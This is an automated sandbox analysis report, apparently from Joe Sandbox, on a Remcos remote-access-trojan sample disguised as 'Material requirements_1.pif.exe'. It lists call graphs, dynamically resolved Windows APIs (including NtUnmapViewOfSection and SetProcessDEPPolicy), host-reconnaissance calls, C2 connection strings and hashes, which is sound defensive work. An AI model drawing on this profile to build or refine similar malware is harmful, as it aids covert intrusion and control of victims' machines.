46813->47128 46814 433b49 46817 433aab 46844 433c6e 46817->46844 46818->46817 47129 43ee04 38 API calls 2 library calls 46818->47129 46827 433acd 46827->46807 46828 433ad1 46827->46828 46829 433ada 46828->46829 47131 442671 28 API calls _abort 46828->47131 47132 433852 13 API calls 2 library calls 46829->47132 46832 433ae2 46832->46815 46834 4336cc 46833->46834 47136 433e1a IsProcessorFeaturePresent 46834->47136 46836 4336d8 47137 4379fe 10 API calls 3 library calls 46836->47137 46838 4336dd 46843 4336e1 46838->46843 47138 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46838->47138 46840 4336ea 46841 4336f8 46840->46841 47139 437a27 8 API calls 3 library calls 46840->47139 46841->46804 46843->46804 47140 436060 46844->47140 46847 433ab1 46848 443432 46847->46848 47142 44ddd9 46848->47142 46850 44343b 46851 433aba 46850->46851 47146 44e0e3 38 API calls 46850->47146 46853 40d767 46851->46853 47148 41bcf3 LoadLibraryA GetProcAddress 46853->47148 46855 40d783 GetModuleFileNameW 47153 40e168 46855->47153 46857 40d79f 47168 401fbd 46857->47168 46860 401fbd 28 API calls 46861 40d7bd 46860->46861 47172 41afd3 46861->47172 46865 40d7cf 47197 401d8c 46865->47197 46867 40d7d8 46868 40d835 46867->46868 46869 40d7eb 46867->46869 47203 401d64 46868->47203 47454 40e986 111 API calls 46869->47454 46872 40d7fd 46874 401d64 28 API calls 46872->46874 46873 40d845 46875 401d64 28 API calls 46873->46875 46878 40d809 46874->46878 46876 40d864 46875->46876 47208 404cbf 46876->47208 47455 40e937 68 API calls 46878->47455 46879 40d873 47212 405ce6 46879->47212 46882 40d87f 47215 401eef 46882->47215 46883 40d824 47456 40e155 68 API calls 46883->47456 46886 40d88b 47219 401eea 46886->47219 46888 40d894 46890 401eea 26 API calls 46888->46890 46889 401eea 26 API calls 46891 40dc9f 46889->46891 46892 40d89d 46890->46892 47130 433ca4 GetModuleHandleW 46891->47130 46893 401d64 28 API calls 46892->46893 46894 40d8a6 
46893->46894 47223 401ebd 46894->47223 46896 40d8b1 46897 401d64 28 API calls 46896->46897 46898 40d8ca 46897->46898 46899 401d64 28 API calls 46898->46899 46901 40d8e5 46899->46901 46900 40d946 46902 401d64 28 API calls 46900->46902 46917 40e134 46900->46917 46901->46900 47457 4085b4 46901->47457 46909 40d95d 46902->46909 46904 40d912 46905 401eef 26 API calls 46904->46905 46906 40d91e 46905->46906 46907 401eea 26 API calls 46906->46907 46910 40d927 46907->46910 46908 40d9a4 47227 40bed7 46908->47227 46909->46908 46914 4124b7 3 API calls 46909->46914 47461 4124b7 RegOpenKeyExA 46910->47461 46912 40d9aa 46913 40d82d 46912->46913 47230 41a473 46912->47230 46913->46889 46919 40d988 46914->46919 47537 412902 30 API calls 46917->47537 46918 40d9c5 46921 40da18 46918->46921 47247 40697b 46918->47247 46919->46908 47464 412902 30 API calls 46919->47464 46922 401d64 28 API calls 46921->46922 46925 40da21 46922->46925 46934 40da32 46925->46934 46935 40da2d 46925->46935 46927 40e14a 47538 4112b5 64 API calls ___scrt_fastfail 46927->47538 46928 40d9e4 47465 40699d 30 API calls 46928->47465 46929 40d9ee 46933 401d64 28 API calls 46929->46933 46942 40d9f7 46933->46942 46939 401d64 28 API calls 46934->46939 47468 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46935->47468 46936 40d9e9 47466 4064d0 97 API calls 46936->47466 46940 40da3b 46939->46940 47251 41ae18 46940->47251 46942->46921 46944 40da13 46942->46944 46943 40da46 47255 401e18 46943->47255 47467 4064d0 97 API calls 46944->47467 46946 40da51 47259 401e13 46946->47259 46949 40da5a 46950 401d64 28 API calls 46949->46950 46951 40da63 46950->46951 46952 401d64 28 API calls 46951->46952 46953 40da7d 46952->46953 46954 401d64 28 API calls 46953->46954 46955 40da97 46954->46955 46956 401d64 28 API calls 46955->46956 46958 40dab0 46956->46958 46957 40db1d 46960 40db2c 46957->46960 46966 40dcaa ___scrt_fastfail 46957->46966 46958->46957 46959 401d64 28 API calls 46958->46959 46964 40dac5 _wcslen 46959->46964 
46961 40db35 46960->46961 46989 40dbb1 ___scrt_fastfail 46960->46989 46962 401d64 28 API calls 46961->46962 46963 40db3e 46962->46963 46965 401d64 28 API calls 46963->46965 46964->46957 46968 401d64 28 API calls 46964->46968 46967 40db50 46965->46967 47528 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46966->47528 46971 401d64 28 API calls 46967->46971 46969 40dae0 46968->46969 46973 401d64 28 API calls 46969->46973 46972 40db62 46971->46972 46976 401d64 28 API calls 46972->46976 46974 40daf5 46973->46974 47469 40c89e 46974->47469 46975 40dcef 46977 401d64 28 API calls 46975->46977 46979 40db8b 46976->46979 46980 40dd16 46977->46980 46985 401d64 28 API calls 46979->46985 47273 401f66 46980->47273 46982 401e18 26 API calls 46984 40db14 46982->46984 46987 401e13 26 API calls 46984->46987 46988 40db9c 46985->46988 46986 40dd25 47277 4126d2 RegCreateKeyA 46986->47277 46987->46957 47526 40bc67 45 API calls _wcslen 46988->47526 47263 4128a2 46989->47263 46993 40dbac 46993->46989 46995 40dc45 ctype 46998 401d64 28 API calls 46995->46998 46996 401d64 28 API calls 46997 40dd47 46996->46997 47283 43a5f7 46997->47283 46999 40dc5c 46998->46999 46999->46975 47002 40dc70 46999->47002 47005 401d64 28 API calls 47002->47005 47003 40dd5e 47529 41bec0 86 API calls ___scrt_fastfail 47003->47529 47004 40dd81 47008 401f66 28 API calls 47004->47008 47006 40dc7e 47005->47006 47009 41ae18 28 API calls 47006->47009 47011 40dd96 47008->47011 47012 40dc87 47009->47012 47010 40dd65 CreateThread 47010->47004 47958 41c97f 10 API calls 47010->47958 47013 401f66 28 API calls 47011->47013 47527 40e219 109 API calls 47012->47527 47015 40dda5 47013->47015 47287 41a696 47015->47287 47016 40dc8c 47016->46975 47018 40dc93 47016->47018 47018->46913 47020 401d64 28 API calls 47021 40ddb6 47020->47021 47022 401d64 28 API calls 47021->47022 47023 40ddcb 47022->47023 47024 401d64 28 API calls 47023->47024 47025 40ddeb 47024->47025 47026 43a5f7 _strftime 42 API calls 47025->47026 47027 40ddf8 
47026->47027 47028 401d64 28 API calls 47027->47028 47029 40de03 47028->47029 47030 401d64 28 API calls 47029->47030 47031 40de14 47030->47031 47032 401d64 28 API calls 47031->47032 47033 40de29 47032->47033 47034 401d64 28 API calls 47033->47034 47035 40de3a 47034->47035 47036 40de41 StrToIntA 47035->47036 47311 409517 47036->47311 47039 401d64 28 API calls 47040 40de5c 47039->47040 47041 40dea1 47040->47041 47042 40de68 47040->47042 47045 401d64 28 API calls 47041->47045 47530 43361d 22 API calls 3 library calls 47042->47530 47044 40de71 47046 401d64 28 API calls 47044->47046 47047 40deb1 47045->47047 47048 40de84 47046->47048 47050 40def9 47047->47050 47051 40debd 47047->47051 47049 40de8b CreateThread 47048->47049 47049->47041 47961 419138 102 API calls 2 library calls 47049->47961 47052 401d64 28 API calls 47050->47052 47531 43361d 22 API calls 3 library calls 47051->47531 47054 40df02 47052->47054 47058 40df6c 47054->47058 47059 40df0e 47054->47059 47055 40dec6 47056 401d64 28 API calls 47055->47056 47057 40ded8 47056->47057 47060 40dedf CreateThread 47057->47060 47061 401d64 28 API calls 47058->47061 47062 401d64 28 API calls 47059->47062 47060->47050 47960 419138 102 API calls 2 library calls 47060->47960 47063 40df75 47061->47063 47064 40df1e 47062->47064 47065 40df81 47063->47065 47066 40dfba 47063->47066 47067 401d64 28 API calls 47064->47067 47069 401d64 28 API calls 47065->47069 47336 41a7b2 GetComputerNameExW GetUserNameW 47066->47336 47070 40df33 47067->47070 47072 40df8a 47069->47072 47532 40c854 31 API calls 47070->47532 47076 401d64 28 API calls 47072->47076 47073 401e18 26 API calls 47075 40dfce 47073->47075 47078 401e13 26 API calls 47075->47078 47079 40df9f 47076->47079 47077 40df46 47080 401e18 26 API calls 47077->47080 47081 40dfd7 47078->47081 47090 43a5f7 _strftime 42 API calls 47079->47090 47082 40df52 47080->47082 47083 40dfe0 SetProcessDEPPolicy 47081->47083 47084 40dfe3 CreateThread 47081->47084 47087 401e13 26 API calls 47082->47087 
47083->47084 47085 40e004 47084->47085 47086 40dff8 CreateThread 47084->47086 47930 40e54f 47084->47930 47088 40e019 47085->47088 47089 40e00d CreateThread 47085->47089 47086->47085 47962 410f36 136 API calls 47086->47962 47091 40df5b CreateThread 47087->47091 47093 40e073 47088->47093 47095 401f66 28 API calls 47088->47095 47089->47088 47957 411524 38 API calls ___scrt_fastfail 47089->47957 47092 40dfac 47090->47092 47091->47058 47959 40196b 49 API calls _strftime 47091->47959 47533 40b95c 7 API calls 47092->47533 47347 41246e RegOpenKeyExA 47093->47347 47096 40e046 47095->47096 47534 404c9e 28 API calls 47096->47534 47100 40e053 47102 401f66 28 API calls 47100->47102 47101 40e12a 47359 40cbac 47101->47359 47105 40e062 47102->47105 47104 41ae18 28 API calls 47107 40e0a4 47104->47107 47108 41a696 79 API calls 47105->47108 47350 412584 RegOpenKeyExW 47107->47350 47110 40e067 47108->47110 47111 401eea 26 API calls 47110->47111 47111->47093 47114 401e13 26 API calls 47117 40e0c5 47114->47117 47115 40e0ed DeleteFileW 47116 40e0f4 47115->47116 47115->47117 47119 41ae18 28 API calls 47116->47119 47117->47115 47117->47116 47118 40e0db Sleep 47117->47118 47535 401e07 47118->47535 47121 40e104 47119->47121 47355 41297a RegOpenKeyExW 47121->47355 47123 40e117 47124 401e13 26 API calls 47123->47124 47125 40e121 47124->47125 47126 401e13 26 API calls 47125->47126 47126->47101 47127->46813 47128->46818 47129->46817 47130->46827 47131->46829 47132->46832 47133->46807 47134->46810 47135->46814 47136->46836 47137->46838 47138->46840 47139->46843 47141 433c81 GetStartupInfoW 47140->47141 47141->46847 47143 44ddeb 47142->47143 47144 44dde2 47142->47144 47143->46850 47147 44dcd8 51 API calls 3 library calls 47144->47147 47146->46850 47147->47143 47149 41bd32 LoadLibraryA GetProcAddress 47148->47149 47150 41bd22 GetModuleHandleA GetProcAddress 47148->47150 47151 41bd5b 32 API calls 47149->47151 47152 41bd4b LoadLibraryA GetProcAddress 47149->47152 47150->47149 47151->46855 
47152->47151 47539 41a64f FindResourceA 47153->47539 47156 43a89c _Yarn 21 API calls 47157 40e192 _Yarn 47156->47157 47542 401f86 47157->47542 47160 401eef 26 API calls 47161 40e1b8 47160->47161 47162 401eea 26 API calls 47161->47162 47163 40e1c1 47162->47163 47164 43a89c _Yarn 21 API calls 47163->47164 47165 40e1d2 _Yarn 47164->47165 47546 406052 47165->47546 47167 40e205 47167->46857 47169 401fcc 47168->47169 47554 402501 47169->47554 47171 401fea 47171->46860 47173 41afe6 47172->47173 47176 41b058 47173->47176 47185 401eef 26 API calls 47173->47185 47188 401eea 26 API calls 47173->47188 47192 41b056 47173->47192 47559 403b60 28 API calls 47173->47559 47560 41bfb9 47173->47560 47174 401eea 26 API calls 47175 41b088 47174->47175 47177 401eea 26 API calls 47175->47177 47567 403b60 28 API calls 47176->47567 47180 41b090 47177->47180 47182 401eea 26 API calls 47180->47182 47181 41b064 47184 401eef 26 API calls 47181->47184 47183 40d7c6 47182->47183 47193 40e8bd 47183->47193 47186 41b06d 47184->47186 47185->47173 47187 401eea 26 API calls 47186->47187 47189 41b075 47187->47189 47188->47173 47190 41bfb9 28 API calls 47189->47190 47190->47192 47192->47174 47194 40e8ca 47193->47194 47196 40e8da 47194->47196 47595 40200a 26 API calls 47194->47595 47196->46865 47198 40200a 47197->47198 47202 40203a 47198->47202 47596 402654 26 API calls 47198->47596 47200 40202b 47597 4026ba 26 API calls _Deallocate 47200->47597 47202->46867 47204 401d6c 47203->47204 47205 401d74 47204->47205 47598 401fff 28 API calls 47204->47598 47205->46873 47209 404ccb 47208->47209 47599 402e78 47209->47599 47211 404cee 47211->46879 47608 404bc4 47212->47608 47214 405cf4 47214->46882 47216 401efe 47215->47216 47217 401f0a 47216->47217 47617 4021b9 26 API calls 47216->47617 47217->46886 47220 4021b9 47219->47220 47221 4021e8 47220->47221 47618 40262e 26 API calls _Deallocate 47220->47618 47221->46888 47225 401ec9 47223->47225 47224 401ee4 47224->46896 47225->47224 47226 402325 28 API calls 47225->47226 

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleLibraryLoadModule
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                        • API String ID: 384173800-625181639
                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                        • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                        • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                        APIs
                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                          • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                          • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                        • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                        • ExitProcess.KERNEL32 ref: 0040E672
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                        • API String ID: 2281282204-3981147832
                        • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                        • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                        • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                        • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF

                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404946
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                        • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-1507639952
                        • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                        • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                        • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                        • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                        • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                        • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                        APIs
                        • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Name$ComputerUser
                        • String ID:
                        • API String ID: 4229901323-0
                        • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                        • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: recv
                        • String ID:
                        • API String ID: 1507349165-0
                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                        APIs
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000104), ref: 0040D790
                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                        • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\Material requirements_1.pif.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                        • API String ID: 2830904901-1556804466
                        • Opcode ID: 27a01aff42a579400e3101b255f1ec488547eb91d73c3514a06912c85c481647
                        • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                        • Opcode Fuzzy Hash: 27a01aff42a579400e3101b255f1ec488547eb91d73c3514a06912c85c481647
                        • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                        Control-flow Graph
                        • Rendered graph of the function starting at 0x413fd4 (node and edge listing omitted); Windows API calls reached in the graph: Sleep, WSAGetLastError, GetTickCount, CreateThread
                        APIs
                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                        • WSAGetLastError.WS2_32 ref: 00414249
                        • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ErrorLastLocalTime
                        • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\Material requirements_1.pif.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                        • API String ID: 524882891-4004264548
                        • Opcode ID: 9fbcf082b9712a934eb7fcb763e3e8452ffb3661f93586d2b4f69cd9451bafcd
                        • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                        • Opcode Fuzzy Hash: 9fbcf082b9712a934eb7fcb763e3e8452ffb3661f93586d2b4f69cd9451bafcd
                        • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                        Control-flow Graph

                        APIs
                        • connect.WS2_32(?,?,?), ref: 004042A5
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
